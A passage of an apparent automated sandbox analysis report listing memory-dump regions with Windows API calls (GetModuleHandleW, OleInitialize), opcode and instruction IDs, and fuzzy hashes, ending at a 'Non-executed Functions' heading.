                                                                            • Opcode Fuzzy Hash: dd5549ee44cb54f7a2c708ce5313ef0756a7b0c4e1d622c8f5b207b78b579968
                                                                            • Instruction Fuzzy Hash: F71103B6D002498FDB10CFA9D584BEEFBB8EF48310F10882AD555A7600C774A545CFA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 1E2957B6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7444048842.000000001E290000.00000040.00000001.sdmp, Offset: 1E290000, based on PE: false
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: 3df69274b02f40c5f8faa821053710d39c96698fbef522951848c0585ec10cd7
                                                                            • Instruction ID: 6bc58af1bd4ce518af090bc4b51112ba2d39a44599e5d83c278b2946e6a80bca
                                                                            • Opcode Fuzzy Hash: 3df69274b02f40c5f8faa821053710d39c96698fbef522951848c0585ec10cd7
                                                                            • Instruction Fuzzy Hash: E511EFB59006498BDB10CF9AD454BDEFBF9AB89220F10852AD959B7200D374A645CFA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • OleInitialize.OLE32(00000000), ref: 1DAB67C5
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7442394718.000000001DAB0000.00000040.00000010.sdmp, Offset: 1DAB0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Initialize
                                                                            • String ID:
                                                                            • API String ID: 2538663250-0
                                                                            • Opcode ID: 906edf4700153d8f33918c9eee5348314f7741ee3f5e4bd20a491425a4f1f2da
                                                                            • Instruction ID: cb143e81fe04a6c922196621eafb22b0d2559580b654c63f17ba72ef05fbb365
                                                                            • Opcode Fuzzy Hash: 906edf4700153d8f33918c9eee5348314f7741ee3f5e4bd20a491425a4f1f2da
                                                                            • Instruction Fuzzy Hash: 111145B58002488FDB10CFA9D445BDEFBF8EB49324F20885AD558A7701C378A545CFA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • OleInitialize.OLE32(00000000), ref: 1DAB67C5
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7442394718.000000001DAB0000.00000040.00000010.sdmp, Offset: 1DAB0000, based on PE: false
                                                                            Similarity
                                                                            • API ID: Initialize
                                                                            • String ID:
                                                                            • API String ID: 2538663250-0
                                                                            • Opcode ID: 6fdc0e065bc3ad208bb9cb1d0812f3ddf85e9fa49ac905cd0de34c809c90233d
                                                                            • Instruction ID: 9b5bdf0dbc880bb286be8bd7ad40aeb3d52c736a0997ca21a3e8758ed86c47d0
                                                                            • Opcode Fuzzy Hash: 6fdc0e065bc3ad208bb9cb1d0812f3ddf85e9fa49ac905cd0de34c809c90233d
                                                                            • Instruction Fuzzy Hash: 4C1115B49006488FDB10CFA9D484BDEFBF8EB48324F24885AD558A7700D374A984CFA6
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 1E2957B6
                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7444048842.000000001E290000.00000040.00000001.sdmp, Offset: 1E290000, based on PE: false
                                                                            Similarity
                                                                            • API ID: HandleModule
                                                                            • String ID:
                                                                            • API String ID: 4139908857-0
                                                                            • Opcode ID: f7c09efaa98ba44e90e3d44b3bf7c886f8ba40ddc27bbebc3450731bd8c3ff24
                                                                            • Instruction ID: ec3c03d4a7d6ec68be4b2993b9b143298aceded6878390bc1d4e18c5dd42129d
                                                                            • Opcode Fuzzy Hash: f7c09efaa98ba44e90e3d44b3bf7c886f8ba40ddc27bbebc3450731bd8c3ff24
                                                                            • Instruction Fuzzy Hash: 671136B190070ACFDB00CF9AD4506DAFBF5BF89218F24859EC459AB212C375A246CFA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7443293091.000000001E1DD000.00000040.00000001.sdmp, Offset: 1E1DD000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a10386643b531cd7d0f5cdc087ee49b49330e23cf6a1b44abcd1185fd080804c
                                                                            • Instruction ID: 731c71e955f58fbc4670f292b11acab7db03b5f62cefca9759e975359afca332
                                                                            • Opcode Fuzzy Hash: a10386643b531cd7d0f5cdc087ee49b49330e23cf6a1b44abcd1185fd080804c
                                                                            • Instruction Fuzzy Hash: DC210871604344EFDB01CF50D9C4B56BB69FB84324F20C769D8050B646C336E88AC7A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7443293091.000000001E1DD000.00000040.00000001.sdmp, Offset: 1E1DD000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 60914e89067c50c333752dad7eeaab42dccaeef4aa49a8f380a4b1bff56a6a8a
                                                                            • Instruction ID: b59c33d1acfb93a345f1332c1b487ff8d34a80f9e277ddf2621a5038c380acc3
                                                                            • Opcode Fuzzy Hash: 60914e89067c50c333752dad7eeaab42dccaeef4aa49a8f380a4b1bff56a6a8a
                                                                            • Instruction Fuzzy Hash: CD21C4B1604340EFDB05DF54D9C8B16BB76FB84318F648769D8044B246C336E89AD7A2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7443427305.000000001E1ED000.00000040.00000001.sdmp, Offset: 1E1ED000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 024c4c4e5d6ba5a520116dc093b4393eacb3f1412ee841ce68d9b82dc3e09ade
                                                                            • Instruction ID: 618fddf7f28c74cb945c781d460de7a707d7f110f71b31565a22439a3f7a0bbc
                                                                            • Opcode Fuzzy Hash: 024c4c4e5d6ba5a520116dc093b4393eacb3f1412ee841ce68d9b82dc3e09ade
                                                                            • Instruction Fuzzy Hash: AE21F870604640DFDB05CF68D9C4B2ABB65FB84314F78CA69E8494B646C336D887C761
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7443427305.000000001E1ED000.00000040.00000001.sdmp, Offset: 1E1ED000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a36b7072d76f7a3f9bdd2369b8a2044f4d711e1c1dadc0a4a41e5dadebf2425c
                                                                            • Instruction ID: 2ec0de2d72f21e37a42dd54afff8f400a0b3bd28006396d7651f96ace8bbe97e
                                                                            • Opcode Fuzzy Hash: a36b7072d76f7a3f9bdd2369b8a2044f4d711e1c1dadc0a4a41e5dadebf2425c
                                                                            • Instruction Fuzzy Hash: BB2180755087809FCB03CF24D994B15BF71EB46314F28C6EAD8498B666C33AD856CB62
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7443293091.000000001E1DD000.00000040.00000001.sdmp, Offset: 1E1DD000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 67b7b4394be81457b51c6d16822ec37ef75c2215ceecc54da36bf977afaa4616
                                                                            • Instruction ID: 8fc9cd09099e8b7f06404743e2b1848f3d39b40c6af627fce3f4e06722bdd630
                                                                            • Opcode Fuzzy Hash: 67b7b4394be81457b51c6d16822ec37ef75c2215ceecc54da36bf977afaa4616
                                                                            • Instruction Fuzzy Hash: 4E117FB6504284DFDB01CF10D6C4B06BF72FB84314F34C6A9D8454B65AC33AD59ACBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Memory Dump Source
                                                                            • Source File: 0000000D.00000002.7443293091.000000001E1DD000.00000040.00000001.sdmp, Offset: 1E1DD000, based on PE: false
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 67b7b4394be81457b51c6d16822ec37ef75c2215ceecc54da36bf977afaa4616
                                                                            • Instruction ID: 3ed7bd3251a2733387a7a91809fbc08a452dff5ccc9560f5632e00cf4ad137a9
                                                                            • Opcode Fuzzy Hash: 67b7b4394be81457b51c6d16822ec37ef75c2215ceecc54da36bf977afaa4616
                                                                            • Instruction Fuzzy Hash: 77117275504284DFDB02CF50D6C4B06BF72FB94324F24C6A9D9494B65AC33AE45ACBA2
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions